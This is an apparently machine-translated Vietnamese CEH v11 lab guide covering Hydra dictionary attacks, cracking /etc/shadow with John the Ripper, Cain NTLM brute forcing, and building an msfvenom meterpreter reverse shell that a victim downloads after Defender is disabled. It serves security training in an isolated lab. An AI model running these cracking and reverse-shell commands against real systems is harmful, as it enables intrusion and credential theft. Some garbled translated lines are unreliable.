CEH v11 @ https://akademy.edu.vn/course/khoa-hoc-cehv11-truc-tuyen/
Trong học phần này, bạn sẽ hoàn thành các bài tập sau:
- Bài tập 1 – Thực hiện tấn công mật khẩu trực tuyến
- Bài tập 2 – Thực hiện Tấn công Mật khẩu Ngoại tuyến
- Bài tập 3 – Tạo tải trọng độc lập với Msfvenom
Sau khi hoàn thành phòng thí nghiệm này, bạn sẽ có thể:
- Tắt Tường lửa Windows trên PLABWIN10
- Sử dụng danh sách từ
- Sử dụng Hydra để đoán tên người dùng và mật khẩu
- Crack mật khẩu Linux bằng John the Ripper
- Tạo bảng cầu vồng
- Khôi phục Windows Hashes bằng Cain và Abel
- Tạo một tải trọng
- Chia sẻ gánh nặng với nạn nhân
- Sử dụng mô-đun Multi / handler và khai thác hệ thống
Trong phiên của bạn, bạn sẽ có quyền truy cập vào cấu hình lab sau.

Tùy thuộc vào các bài tập, bạn có thể sử dụng hoặc không sử dụng tất cả các thiết bị, nhưng chúng được hiển thị ở đây trong bố cục để hiểu tổng thể về cấu trúc liên kết của phòng thí nghiệm.
- PLABDC01 – (Windows Server 2019 – Máy chủ miền)
- PLABDM01 – (Windows Server 2019 – Thành viên miền)
- PLABWIN10 – (Windows 10 – Máy trạm)
- PLABKALI01 – (Kali 2019.2 – Máy trạm Linux Kali)
Bài tập 1- Thực hiện tấn công mật khẩu trực tuyến
Một cuộc tấn công mật khẩu trực tuyến được thực hiện trên dịch vụ mạng, chẳng hạn như SSH, HTTP, FTP, SMB, v.v. Ví dụ: kẻ tấn công có thể cố gắng đoán mật khẩu của người dùng từ thông tin đăng nhập Trang web. Hầu hết thời gian, máy chủ hoặc thiết bị mạng không được trang bị để chặn một cuộc tấn công bằng mật khẩu trực tuyến. Do đó, những cuộc tấn công này có thể thành công mà không cần nỗ lực nhiều.
Các cuộc tấn công bằng mật khẩu có thể có hai loại. Loại đầu tiên là tấn công từ điển, sử dụng danh sách các từ phổ biến. Nó tiếp tục chạy qua danh sách cho đến khi tìm thấy một kết quả phù hợp. Mặt khác, một cuộc tấn công brute-force cố gắng sử dụng các từ dựa trên một bộ ký tự nhất định. Với cuộc tấn công bằng mật khẩu trực tuyến, có thể sử dụng một trong hai phương pháp. Tuy nhiên, một cuộc tấn công từ điển chủ yếu là sự lựa chọn vì tốc độ tấn công chậm.
Trong bài tập này, bạn sẽ tìm hiểu về cách thực hiện một cuộc tấn công bằng mật khẩu trực tuyến.
Kết quả học tập
Sau khi hoàn thành bài tập này, bạn sẽ có thể:
- Tắt Tường lửa Windows trên PLABWIN10
- Sử dụng danh sách từ
- Sử dụng Hydra để đoán tên người dùng và mật khẩu
Thiết bị của bạn
Bạn sẽ sử dụng các thiết bị sau trong phòng thí nghiệm này. Vui lòng bật nguồn này ngay bây giờ.
- PLABDC01 – (Windows Server 2019 – Máy chủ miền)
- PLABWIN10 – (Windows 10 – Máy trạm)
- PLABKALI01 – (Kali 2019.2 – Máy trạm Linux Kali)

Nhiệm vụ 1 – Tắt Tường lửa Windows trên PLABWIN10
Bạn sẽ cần phải tắt Tường lửa của Windows để thực hiện một cuộc tấn công vào PLABWIN10 . Có những phương pháp tấn công mà bạn có thể sử dụng để vượt qua Windows hoặc bất kỳ tường lửa nào khác đang chạy trên mục tiêu. Tuy nhiên, vì lợi ích của mô-đun này, bạn sẽ tắt Tường lửa của Windows và tiếp tục các tác vụ còn lại.
Để tắt Tường lửa Windows trên PLABWIN10 , hãy thực hiện các bước sau:
Bước 1
Đảm bảo rằng bạn đã kết nối với PLABWIN10 và đăng nhập vào hệ thống.
Lưu ý rằng màn hình PLABWIN10 được hiển thị.

Bước 2
Trong hộp văn bản Nhập vào đây để tìm kiếm , hãy nhập nội dung sau:
windows firewall
Từ kết quả tìm kiếm, chọn Tường lửa của Bộ bảo vệ Windows .

Bước 3
Cửa sổ Tường lửa của Bộ bảo vệ Windows được hiển thị. Trên trang Trợ giúp bảo vệ PC của bạn với Tường lửa của Bộ bảo vệ Windows , nhấp vào Bật hoặc tắt Tường lửa của Bộ bảo vệ Windows trong ngăn bên trái.

Bước 4
Trên cài đặt Tùy chỉnh cho từng loại trang mạng , chọn Tắt Tường lửa của Bộ bảo vệ Windows (không được khuyến nghị) cho Miền , Mạng riêng và Mạng công cộng .
Bấm OK .

Bước 5
Trên trang Trợ giúp bảo vệ PC của bạn với Tường lửa của Bộ bảo vệ Windows , hãy lưu ý rằng Tường lửa của Bộ bảo vệ Windows hiện đã bị tắt cho Miền , Riêng tư và Mạng công cộng .

Đóng cửa sổ Control Panel và cửa sổ PLABWIN10 .
Nhiệm vụ 2 – Sử dụng Danh sách từ
Trong một cuộc tấn công từ điển, một danh sách các từ, được gọi là danh sách từ, được xác định trước và được sử dụng để khớp với mật khẩu của nạn nhân. Có sẵn danh sách mật khẩu được tạo sẵn trên Internet. Danh sách mật khẩu có thể lớn vài byte hoặc cũng có thể là gigabyte, vì càng nhiều từ trong tệp mật khẩu, kích thước càng lớn. Nếu bạn không có ý định sử dụng danh sách từ được xác định trước, bạn có thể tạo danh sách của riêng mình. Có những công cụ có sẵn có thể giúp bạn tạo một danh sách từ. Một số công cụ được sử dụng phổ biến là:
- Wyd : Công cụ lập hồ sơ mật khẩu
- Crunch : Trình tạo danh sách từ bẻ khóa mật khẩu
- CeWL : Trình tạo danh sách từ tùy chỉnh bẻ khóa mật khẩu
- RSMangler : Trình tạo danh sách từ dựa trên từ khóa để ép buộc Brute
Trong nhiệm vụ này, bạn sẽ tìm hiểu về danh sách từ. Để thực hiện việc này, hãy thực hiện các bước sau:
Bước 1
Đảm bảo bạn đã bật nguồn cho tất cả các thiết bị được liệt kê trong phần giới thiệu và kết nối với PLABKALI01 .
Thông tin xác thực là:
Tên tài khoản:nguồn gốc
Mật khẩu:Passw0rd
Lưu ý rằng màn hình Kali được hiển thị.

Bước 2
Trên màn hình nền, trong ngăn bên trái, nhấp vào biểu tượng Thiết bị đầu cuối .

Bước 3
Cửa sổ đầu cuối được hiển thị. Đầu tiên, hãy xem danh sách từ được xác định trước có sẵn trong Kali Linux. Để thực hiện việc này, hãy nhập lệnh sau:
ls -l /usr/share/wordlists
Nhấn Enter .

Bước 4
Nhận thấy một số tệp danh sách từ được hiển thị.

Bước 5
Xóa màn hình bằng cách nhập lệnh sau:
clear
Bạn có một tùy chọn để sử dụng danh sách từ được xác định trước. Bạn cũng có thể tải xuống danh sách từ từ Internet. Có một số danh sách từ có sẵn đã phát triển thành kích thước Gigabyte. Một giải pháp thay thế là tạo một danh sách từ nhỏ theo cách thủ công, bạn sẽ làm ngay bây giờ. Trong cửa sổ nhắc lệnh, hãy nhập lệnh sau:
leafpad plab.txt
Nhấn Enter .

Bước 6
Leafpad mở ra với một tệp có tên (plab.txt ).
Nhập các từ sau:
test
bee
bug
12345
12345678
password
passw0rd
Passw0rd
p@ssw0rd
admin
admin@123
Nhấn Enter sau mỗi từ ngoại trừ từ cuối cùng.

Bước 7
Nhấn Ctrl + s để lưu tệp.
Đóng tệp plab.txt .

Bước 8
Hãy xác minh xem plab.txt có được tạo hay không. Nhập lệnh sau vào cửa sổ dòng lệnh:
ls -l
Nhấn Enter . Lưu ý rằng tệp plab.txt đã được tạo.

Bước 9
Xóa màn hình bằng cách nhập lệnh sau:
clear
Kali Linux cũng chứa một công cụ có tên cewl , được sử dụng để tạo danh sách từ.
Nhập lệnh sau:Lưu ý: Tham số -w xác định tên của danh sách từ. Tham số -d xác định độ sâu của tìm kiếm trong một Trang web. Tham số -m xác định độ dài từ tối thiểu.
cewl -w test.txt -d 5 -m 3 intranet
Nhấn Enter .

Bước 10
Lệnh chạy thành công mà không có bất kỳ lỗi nào.

Bước 11
Hãy xác minh xem tệp test.txt đã được tạo chưa. Nhập lệnh sau:
ls -l
Nhấn Enter .

Bước 12
Lưu ý rằng tệp test.txt đã được tạo.

Bước 13
Xóa màn hình bằng cách nhập lệnh sau:
clear
Hãy mở tệp test.txt và xem các từ được lưu trữ trong đó.
Nhập lệnh sau:
leafpad test.txt
Nhấn Enter .

Bước 14
Tệp test.txt hiện đã được mở. Nó đã thu được một số từ từ Trang web Intranet.
Đóng tệp này.

Giữ cửa sổ đầu cuối mở.
Nhiệm vụ 3 – Sử dụng Hydra để đoán tên người dùng và mật khẩu
Hydra là một công cụ có thể thực hiện các cuộc tấn công từ điển chống lại một số giao thức, chẳng hạn như HTTP, FTP, SMB, SSH, v.v. Hydra được thiết kế để thực hiện các cuộc tấn công chống lại các dịch vụ xác thực, có thể đang chạy bằng giao thức, chẳng hạn như HTTP.
Trong nhiệm vụ này, bạn sẽ sử dụng Hydra để đoán tên người dùng và mật khẩu. Để thực hiện việc này, hãy thực hiện các bước sau:
Bước 1
Đảm bảo bạn đã bật nguồn cho tất cả các thiết bị được liệt kê trong phần giới thiệu và kết nối với PLABKALI01 . Cửa sổ nhắc lệnh sẽ được mở.
Xóa màn hình bằng cách nhập lệnh sau:
clear
Hydra không được cài đặt trên Kali Linux theo mặc định. Để sử dụng nó, bạn cần cài đặt nó trước. Nhập lệnh sau:
apt-get install hydra
Nhấn Enter .

Bước 2
Quá trình cài đặt cho Hydra bắt đầu. Trong quá trình cài đặt, bạn cần xác nhận cài đặt. Nhập nội dung sau:
Y
Nhấn Enter .

Bước 3
Quá trình cài đặt cho Hydra vẫn tiếp tục.Lưu ý: Có thể mất vài phút để hoàn tất quá trình cài đặt cho Hydra.
Sau khi cài đặt xong, bạn quay lại lời nhắc trong cửa sổ đầu cuối.

Bước 4
Bây giờ, bạn sẽ sử dụng Hydra để thực hiện tấn công từ điển bằng plab.txt mà bạn đã tạo.Lưu ý: Trong thực tế, danh sách từ sẽ không bao giờ nhỏ như vậy, nhưng để minh họa, chúng ta có thể sử dụng danh sách từ này.
Xóa màn hình bằng cách nhập lệnh sau:
clear
Bạn có một ứng dụng dễ bị tấn công, bWAPP , chạy trên 192.168.0.10 . Bạn sẽ sử dụng tệp plab.txt để thực hiện một cuộc tấn công từ điển chống lại ứng dụng này. Để thực hiện việc này, hãy nhập lệnh sau:Lưu ý: Lệnh hydra nhận các đầu vào tham số sau: -t: Xác định số lần đăng nhập để thử đồng thời. -V: Hiển thị từng lần đăng nhập và mật khẩu. -f : Dừng cuộc tấn công từ điển sau khi tìm thấy kết quả phù hợp với tên người dùng và mật khẩu. -l tên người dùng: Xác định tên người dùng cần được bẻ khóa. Ví dụ: con ong là tên người dùng cho ứng dụng bWAPP. Nếu bạn không biết tên người dùng, bạn có thể sử dụng tham số -L và cung cấp danh sách tên người dùng, tương tự như danh sách từ. -P wordlist: Xác định danh sách từ chứa các mật khẩu có thể xảy ra. Bạn có thể sử dụng tham số -p cho một mật khẩu duy nhất. Tên trang web hoặc địa chỉ IP:Xác định tên trang web hoặc địa chỉ IP của nó. Giao thức : Xác định các dịch vụ mà cuộc tấn công từ điển được khởi chạy.
hydra -t 5 -V -f -l bee -P plab.txt 192.168.0.10 ftp
Nhấn Enter .

Bước 5
Hãy xem Hydra có thể tìm ra mật khẩu cho người dùng không, ong .Lưu ý: Tùy theo dung lượng của wordlist mà thời gian nhận được kết quả sẽ khác nhau.
Chú ý dòng chữ màu xanh lá cây. Bạn đã có thể bẻ khóa mật khẩu cho dịch vụ FTP này trên máy chủ, 192.168.0.10 .

Bài tập 2 – Thực hiện Tấn công Mật khẩu Ngoại tuyến
Không giống như tấn công mật khẩu trực tuyến, là một phương pháp để bẻ khóa mật khẩu cho một dịch vụ mạng, phương pháp ngoại tuyến được thực hiện trên một tệp, chẳng hạn như / etc / shadow trong cơ sở dữ liệu Linux hoặc SAM trong Windows.
Trong bài tập này, bạn sẽ tìm hiểu về cách thực hiện một cuộc tấn công ngoại tuyến.
Kết quả học tập
Sau khi hoàn thành bài tập này, bạn sẽ có thể:
- Crack mật khẩu Linux bằng John the Ripper
- Khôi phục mật khẩu băm từ tệp Windows SAM
- Crack mật khẩu tệp cấu hình
- Tạo bảng cầu vồng
- Dump mật khẩu văn bản rõ từ bộ nhớ bằng Windows Credential Editor
Thiết bị của bạn
Bạn sẽ sử dụng thiết bị sau trong phòng thí nghiệm này. Vui lòng bật nguồn thiết bị.
- PLABDC01 – (Windows Server 2019 – Máy chủ miền)
- PLABWIN10 – (Windows 10 – Máy trạm)
- PLABKALI01 – (Kali 2019.2 – Máy trạm Linux Kali)

Nhiệm vụ 1 – Bẻ khóa mật khẩu Linux bằng John the Ripper
Mọi hệ thống Linux đều có hai tệp chính chứa thông tin người dùng và mật khẩu. Tệp đầu tiên là / etc / passwd , chứa thông tin người dùng chung, chẳng hạn như:
- tên tài khoản
- Mật khẩu được mã hóa
- Số ID người dùng (UID)
- Số ID nhóm của người dùng (GID)
- Tên đầy đủ của người dùng (GECOS)
- Thư mục chính của người dùng.
- Vỏ đăng nhập

Một hàng trong trường mật khẩu đại diện cho một tài khoản. Các trường được hiển thị theo thứ tự sau dưới dạng shwon trong ví dụ sau:
root:x:0:0:root:/root>/bin/bash
Trường gốc đại diện cho tên người dùng.
Trường x đại diện cho mật khẩu.
Trường 0 , là một trong ví dụ đã cho ở trên, là UID, là User ID.
Trường 0 , là trường thứ hai trong ví dụ đã cho ở trên, là GID, là ID nhóm.
Trường gốc đại diện cho nhận xét, giống như mô tả người dùng hơn.
Trường / root đại diện cho thư mục chính.
Trường / bin / bash đại diện cho trình bao được sử dụng.
Các tin / etc / shadow tập tin, mặt khác, lưu trữ thông tin mật khẩu người dùng. Mật khẩu cho người dùng được lưu trữ dưới dạng mã hóa. Tệp này cũng chứa thông tin, chẳng hạn như:
- Ngày hết hạn mật khẩu
- Cần thay đổi mật khẩu hay không
- Thời gian tối thiểu và tối đa giữa các lần thay đổi mật khẩu

Trong nhiệm vụ này, bạn sẽ tìm hiểu về cách bẻ khóa Mật khẩu Linux bằng John the Ripper. Để thực hiện việc này, hãy thực hiện các bước sau:
Bước 1
Đảm bảo bạn đã bật nguồn cho tất cả các thiết bị được liệt kê trong phần giới thiệu và kết nối với PLABKALI01 . Cửa sổ đầu cuối sẽ được mở.
Xóa màn hình bằng cách nhập lệnh sau:
clear
Đầu tiên, bạn cần sử dụng lệnh unshadow để kết hợp cả hai tệp / etc / passwd và / etc / shadow . Trong bước này, bạn sẽ kết hợp cả hai tệp này thành một tệp duy nhất có tên là pass . Điều này cần được thực hiện để John the Ripper tiết lộ mật khẩu. Để thực hiện việc này, hãy nhập lệnh sau:
unshadow /etc/passwd /etc/shadow > pass
Nhấn Enter .

Bước 2
Lưu ý rằng đầu ra được tạo và lệnh chạy thành công.

Bước 3
Tiếp theo, bạn sẽ sử dụng John the Ripper để lấy mật khẩu từ tệp, vượt qua .
Để thực hiện việc này, hãy nhập lệnh sau:
john pass
Nhấn Enter .

Bước 4
Lưu ý rằng mật khẩu cho người dùng root đã được tiết lộ thành công.

Nhiệm vụ 2 – Tạo bảng cầu vồng
Khi người dùng nhập mật khẩu để đăng nhập vào hệ điều hành, mật khẩu sẽ được chuyển thành hàm băm bằng thuật toán mã hóa. Mật khẩu không được lưu trữ ở định dạng văn bản thuần túy. Khi người dùng nhập mật khẩu, mật khẩu này sẽ được chuyển đổi thành hàm băm và sau đó được so sánh với hàm băm được lưu trữ, đây chỉ là hàm một chiều. Điều này có nghĩa là một khi mật khẩu được băm, nó không thể được hủy. Bạn không thể đảo ngược hàm băm để lấy ra giá trị của nó.
Bảng cầu vồng là một cơ sở dữ liệu chứa danh sách mật khẩu bản rõ được tính toán trước và các giá trị băm tương ứng của chúng. Mỗi từ, khi được chuyển đổi thành hàm băm bằng một thuật toán cụ thể (chẳng hạn như MD5), sẽ luôn tạo ra cùng một hàm băm. Ví dụ: nếu bạn chuyển đổi Passw0rd thành băm, nó sẽ luôn tạo ra băm MD5 sau:
d41e98d1eafa6d6011d3a70f1a5b92f0
Rainbow Table mất nhiều thời gian trong quá trình tạo vì một tệp duy nhất có thể chứa hàng triệu mật khẩu. Mặt khác, chúng có thể được tái sử dụng nhiều lần. Bạn có thể tạo Bảng Cầu vồng của riêng mình hoặc tải xuống từ Internet.
Trong nhiệm vụ này, bạn sẽ học cách tạo Bảng Cầu vồng. Để thực hiện việc này, hãy thực hiện các bước sau:
Bước 1
Đảm bảo bạn đã bật nguồn cho tất cả các thiết bị được liệt kê trong phần giới thiệu và kết nối với PLABWIN10 .
Trên màn hình nền, ở khung bên trái, nhấp chuột phải vào biểu tượng Cain và chọn Mở vị trí tệp .

Bước 2
Các File Explorer cửa sổ được hiển thị. Bấm đúp vào thư mục Winrtgen để mở nó.

Bước 3
Trong thư mục Winrtgen , bấm đúp vào Winrtgen .

Bước 4
Hộp thoại Winrtgen v2.9.4 (Rainbow Tables Generator) by mao hiển thị. Nhấp vào Thêm bảng .

Bước 5
Các cầu vồng Bảng thuộc tính hộp thoại sẽ được hiển thị. Bây giờ bạn sẽ thay đổi một số giá trị trong hộp thoại này.

Bước 6
Thay đổi các giá trị sau:
Trong menu thả xuống băm , chọn md5 .
Trong hộp văn bản Min Len , ghi đè giá trị hiện có thành 5 .
Trong hộp văn bản Đếm Chuỗi , hãy ghi đè giá trị hiện có thành 1000 .
Bấm OK .

Bước 7
Quay lại hộp thoại Winrtgen v2.9.4 (Rainbow Tables Generator) by mao , một Bảng Cầu vồng MD5 hiện đã được thêm vào. Bấm OK .

Bước 8
Chọn bảng cầu vồng và nhấp vào Bắt đầu .
Lưu ý rằng dấu kiểm Màu xanh lá cây xuất hiện trên tên tệp. Nhấp vào Thoát .Lưu ý: Nếu bạn không bấm Bắt đầu, tệp sẽ không được tạo và dấu kiểm Màu xanh lá cây sẽ không xuất hiện đối với tên tệp.

Bước 9
Bạn đã quay lại cửa sổ File Explorer . Lưu ý rằng Bảng Cầu vồng MD5 hiện đã được tạo trong thư mục Winrtgen .

Đóng cửa sổ File Explorer .
Nhiệm vụ 3 – Khôi phục Windows Hashes bằng Cain và Abel
Cain & Abel là một tiện ích bẻ khóa mật khẩu có thể giúp bạn khôi phục mật khẩu từ nhiều nguồn khác nhau, chẳng hạn như hệ thống cục bộ và không dây. Nó cung cấp các phương pháp khác nhau để bẻ khóa mật khẩu. Các phương pháp này là:
- Từ điển
- Lực lượng vũ phu
- Phân tích tiền điện tử
Trong nhiệm vụ này, bạn sẽ tìm hiểu về cách sử dụng Cain. Để thực hiện việc này, hãy thực hiện các bước sau:Cảnh báo: Trước khi tiếp tục tác vụ này, bạn cần tắt Tường lửa của Windows. Ngoài ra, hãy tạo một tài khoản người dùng mới có tên là John và đặt mật khẩu làPassw0rd.
Bước 1
Đảm bảo bạn đã cấp nguồn cho các thiết bị cần thiết, Kết nối với PLABWIN10 .
Bấm đúp vào Cain để bắt đầu nó.

Bước 2
Các Cain cửa sổ được hiển thị.

Bước 3
Nhấp vào tab Cracker .
Từ ngăn bên trái, chọn LM & NTLM Hashes .

Bước 4
Nhấp vào nút + ( Thêm vào danh sách ) trên thanh menu.

Bước 5
Các Add NT băm từ trình hướng dẫn được hiển thị. Giữ lựa chọn mặc định và nhấp vào Tiếp theo .

Bước 6
Lưu ý rằng một số tài khoản người dùng được hiển thị.

Bước 7
Trong ngăn bên phải, bấm chuột phải vào Quản trị viên , chọn Brute-Force Attack , rồi chọn NTLM Hashes .

Bước 8
Các Brute-Force Attack hộp thoại sẽ được hiển thị. Hộp văn bản được xác định trước chứa một chuỗi ký tự và số. Nhấp vào menu thả xuống và chọn danh sách cuối cùng thứ hai từ dưới cùng. Danh sách này chứa các chữ cái viết thường và viết hoa, số và các ký tự đặc biệt.

Bước 9
Từ hộp danh sách Độ dài Mật khẩu – Tối đa, đặt giá trị thành 8 .
Nhấp vào Bắt đầu .

Bước 10
Quá trình bẻ khóa mật khẩu được bắt đầu. Lưu ý thời gian trong trường Thời gian còn lại . Thời gian này phụ thuộc vào giá trị được xác định trong menu thả xuống Tối đa và bộ ký tự mà bạn chọn. Giá trị càng cao, thời gian bẻ khóa mật khẩu càng lâu. Ngoài ra, bạn cung cấp nhiều tổ hợp hơn trong bảng mã, sẽ mất nhiều thời gian hơn để sử dụng các tổ hợp và bẻ khóa mật khẩu.
Nhấp vào Dừng .

Bước 11
Nhấp vào Thoát .

Bước 12
Bạn đã quay lại cửa sổ Cain .

Đóng tất cả các cửa sổ đang mở.
Bài tập 3 – Tạo tải trọng độc lập với Msfvenom
Nếu một hệ thống chưa được vá với các bản cập nhật mới nhất hoặc không được định cấu hình bảo mật đầy đủ, hệ thống đó rất dễ bị tấn công. Người dùng, mặc dù hệ thống đang được cấu hình, vẫn có thể bị thuyết phục thực thi một ứng dụng độc hại, điều này cho phép kẻ tấn công giành quyền kiểm soát hệ thống. Có nhiều công cụ khác nhau có thể được sử dụng để xâm nhập vào hệ thống. Msfvenom là một trong những công cụ như vậy. Nó cho phép bạn tạo các tải trọng tùy chỉnh, có thể được triển khai cho hệ thống của người dùng. Để triển khai một ứng dụng độc hại, tin tặc có thể sử dụng phương pháp kỹ thuật xã hội.
Msfvenom là sự kết hợp của hai công cụ khác nhau, Msfpayload và Msfencode, là một phần của Kali Linux. Chức năng của cả hai công cụ sau đó được kết hợp thành một công cụ duy nhất có tên Msfvenom. Tuy nhiên, cả hai công cụ Msfpayload và Msfencode vẫn tồn tại trong Kali Linux dưới dạng các công cụ độc lập.
Trong bài tập này, bạn sẽ tìm hiểu về cách tạo một tải trọng độc lập với Msfvenom và triển khai nó trên máy chủ được nhắm mục tiêu để khai thác.
Kết quả học tập
Sau khi hoàn thành bài tập này, bạn sẽ có thể:
- Tạo một tải trọng
- Chia sẻ gánh nặng với nạn nhân
- Sử dụng mô-đun Multi / handler và khai thác hệ thống
Thiết bị của bạn
Bạn sẽ sử dụng thiết bị sau trong phòng thí nghiệm này. Vui lòng bật nguồn thiết bị.
- PLABDC01 – (Windows Server 2019 – Máy chủ miền)
- PLABWIN10 – (Windows 10 – Máy trạm)
- PLABKALI01 – (Kali 2019.2 – Máy trạm Linux Kali)

Nhiệm vụ 1 – Tạo một tải trọng
Msfvenom được thiết kế để tạo các tải trọng độc lập. Để sử dụng công cụ này, bạn không cần gọi khung công tác Metasploit và nó có thể hoạt động trực tiếp từ dấu nhắc lệnh trong Kali Linux.
Với lệnh msfvenom, bạn có thể liệt kê tất cả các tải trọng có sẵn hoặc chọn một tải trọng. Để chọn trọng tải, hãy thực hiện các bước sau:
Bước 1
Đảm bảo rằng bạn được kết nối với PLABKALI01 .
Các thông tin đăng nhập nếu được yêu cầu như sau
Tên người dùng: root
Mật khẩu: Passw0rd
Trên màn hình nền, trong ngăn bên trái, nhấp vào biểu tượng Thiết bị đầu cuối .

Bước 2
Bạn có thể liệt kê các tải trọng hiện có với msfvenom . Để thực hiện việc này, hãy nhập lệnh sau:
msfvenom -l payloads
Nhấn Enter .

Bước 3
Kết quả của lệnh này được hiển thị.Lưu ý: Bạn có thể cuộn lên để xem danh sách các trọng tải ngay từ đầu.

Bước 4
Xóa màn hình bằng cách nhập lệnh sau:
clear
Bạn có thể chọn tải trọng với tham số -p . Để thực hiện việc này, hãy nhập lệnh sau:Lưu ý: Tham số – f được sử dụng để chỉ định định dạng tệp. Các -o tham số thiết lập tùy chọn đúng được sử dụng với các mô-đun.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.4 -f exe -o payload.exe
Nhấn Enter .

Bước 5
Lưu ý đầu ra của lệnh đã cho. Tải trọng thực thi với tên payload.exe hiện đã được tạo.

Giữ cửa sổ đầu cuối mở.
Nhiệm vụ 2 – Chia sẻ gánh nặng với nạn nhân
Sau khi tạo tải trọng, bạn cần đảm bảo rằng nó đến được hệ thống của nạn nhân bằng bất kỳ phương tiện nào. Ví dụ: bạn có thể chia sẻ nó trên USB, điều này có thể không thực hiện được nếu bạn đang ở một thành phố hoặc quốc gia khác. Phương pháp dễ nhất có thể là chia sẻ nó trên Web, nạn nhân có thể tải xuống.
Trong nhiệm vụ này, bạn sẽ học cách thỏa hiệp với máy chủ. Để thực hiện việc này, hãy thực hiện các bước sau:
Bước 1
Tiếp theo, bạn cần đảm bảo rằng tệp này có sẵn cho hệ thống đích. Bạn cần khởi động SimpleHTTPServer , trình này sẽ cung cấp tệp. Để thực hiện việc này, hãy nhập lệnh sau:
python -m SimpleHTTPServer
Nhấn Enter .

Bước 2
Lưu ý rằng SimpleHTTPServer hiện đã khởi động.

Bước 3
Kết nối với PLABWIN10 . Màn hình nền của nó được hiển thị.

Bước 4
Trong hộp văn bản Nhập vào đây để tìm kiếm , hãy nhập nội dung sau:
Internet Explorer
Từ kết quả tìm kiếm, chọn Internet Explorer .

Bước 5
http://192.168.0.4:8000/payload.exe
Lưu ý: Việc tải xuống và thực thi tệp này sẽ tạo ra một kết nối ngược đến hệ thống của kẻ tấn công. Trong mô-đun tiếp theo, bạn sẽ học cách xâm nhập hệ thống của nạn nhân bằng cách thực thi tải trọng.

Bước 6
Lưu ý rằng payload.exe hiện đang được nhắc tải xuống trên hệ thống của người dùng. Nhấp vào Lưu .Lưu ý: Trong trường hợp thực tế, bạn sẽ không đặt tên tệp là payload.exe. Nó thường sẽ là một số tên thú vị, sẽ thu hút người dùng tải xuống tệp. Ngoài ra, trong hầu hết các trường hợp, các tệp này được bảo vệ theo cách để tránh bị bộ quét chống vi-rút bắt.

Bước 7
Trong thanh thông báo, nhấp vào Xem tải xuống .

Bước 8
Các Xem Tải xuống – Internet Explorer hộp thoại sẽ được hiển thị. Nhấp chuột phải vào tệp payload.exe và chọn Mở thư mục chứa .

Bước 9
Các File Explorer cửa sổ được mở ra. Lưu ý rằng tệp payload.exe hiện đã được tải xuống trong thư mục Tải xuống .

Nhiệm vụ 3 – Sử dụng Mô-đun Multi / Handler và Khai thác Hệ thống
Vì bạn đã tạo một mô-đun độc lập, nó sẽ không thể tạo kết nối giữa bạn và hệ thống của nạn nhân. Phương pháp duy nhất là sử dụng các mô-đun đa / xử lý, mà sẽ bắt kết nối Meterpreter khi payload.exe được thực hiện trên hệ thống của nạn nhân.
Để sử dụng mô-đun multi / handler, hãy thực hiện các bước sau:
Bước 1
Kết nối với PLABKALI01 . Lưu ý rằng SimpleHTTPServer vẫn đang chạy.

Bước 2
Bạn cần khởi động msfconsole . Trong màn hình nền, hãy nhấp vào biểu tượng khung metasploit .
Trong cửa sổ dòng lệnh, nhập
msfconsole

Bước 3
Các Metasploit Framework bắt đầu và hiển thị các msfconsole nhắc.
Bạn cần đặt mô-đun multi / handler .
Nhập lệnh sau:
use multi/handler
Nhấn Enter .

Bước 4
Mô-đun hiện đã được thiết lập. Tiếp theo, bạn cần đặt tải trọng windows / meterpreter / reverse_tcp , được sử dụng với msfvenom . Để thực hiện việc này, hãy nhập lệnh sau:
set payload windows/meterpreter/reverse_tcp
Nhấn Enter .

Bước 5
Tải trọng hiện đã được thiết lập. Nhập lệnh sau để xem các tùy chọn của nó:
show options
Nhấn Enter .

Bước 6
Lưu ý đầu ra của lệnh này. Bạn sẽ cần đặt máy chủ cục bộ, máy chủ chưa được đặt. Bạn có thể sử dụng cổng mặc định.
Để đặt giá trị LHOST , hãy nhập lệnh sau:
set LHOST 192.168.0.4
Nhấn Enter .

Bước 7
Lưu ý rằng giá trị của LHOST hiện được đặt thành 192.168.0.4 .Lưu ý: Bạn có thể chạy lại lệnh tùy chọn hiển thị để xác minh giá trị.

Bước 8
Cuối cùng, đã đến lúc kích hoạt tải trọng. Nhập lệnh sau:
exploit
Nhấn Enter .

Bước 9
Phiên làm việc hiện đã bắt đầu.

Bước 10
Chuyển về PLABWIN10 . Bạn sẽ ở trong thư mục Tải xuống .Cảnh báo: Đảm bảo rằng Tường lửa của Windows được đặt thành Tắt. Bạn cũng cần dừng Windows Defender để các bước tiếp theo thành công.
Vui lòng tham khảo Bài tập 1, Nhiệm vụ 1 về việc tắt Tường lửa của Windows.
Các bước sau sẽ trình bày chi tiết về việc dừng Windows Defender.
Thu nhỏ tất cả các cửa sổ đang mở để truy cập màn hình nền.
Nhấp vào thanh Loại ở đây để tìm kiếm và nhập Trung tâm Bảo mật của Bộ bảo vệ Windows và nhấp vào kết quả.

Bước 11
Trên Cửa sổ Trung tâm Bảo mật của Bộ bảo vệ Windows,
Nhấp vào Bảo vệ khỏi mối đe dọa và vi-rút.

Bước 12
Nhấp vào cài đặt bảo vệ chống vi-rút và mối đe dọa

Bước 13
Trong phần Bảo vệ thời gian thực , nhấp vào nút để chuyển tùy chọn này thành Tắt.Nếu tùy chọn này không được đặt thành Tắt, các bước sau trên KALI sẽ không thành công.

Bước 14
Đóng Trung tâm Bảo mật của Bộ bảo vệ Windows.
Mở thư mục Tải xuống . Đây có thể là một tab đang mở hoặc nhấp vào File Explorer trên thanh tác vụ và nhấp vào Tải xuống trên bảng điều khiển bên trái.
Bấm đúp để thực thi tệp payload.exe .
Lưu ý rằng không có gì xảy ra trong PLABWIN10 sau khi bạn bấm đúp vào tệp.

Bước 15
Chuyển về PLABKALI01 . Chú ý rằng một Meterpreter kết nối với PLABWIN10 hiện đang thiết lập thành công.Lưu ý: Nếu bạn nhận được lời nhắc liên quan đến bộ lọc SmartScreen, hãy nhấp vào Chạy.

Bước 16
Để nhận chi tiết tài khoản người dùng đã đăng nhập hiện tại của PLABWIN10 , hãy nhập lệnh sau:
getuid
Nhấn Enter .

Bước 17
Chú ý tên tài khoản người dùng đã đăng nhập hiện tại được hiển thị.

Bước 18
Bạn có thể thực hiện báo cáo đặc quyền bằng cách gõ lệnh sau:
getsystem
Nhấn Enter .

Bước 19
Lệnh chạy thành công. Nâng cấp đặc quyền hiện đã thành công.

Bước 20
Lưu ý: Lệnh Clear không hoạt động trên trình bao lệnh métpreter. Nhấn Enter nhiều lần để hiển thị một cửa sổ sạch.
Hãy mở dấu nhắc lệnh của Windows. Nhập lệnh sau:
shell
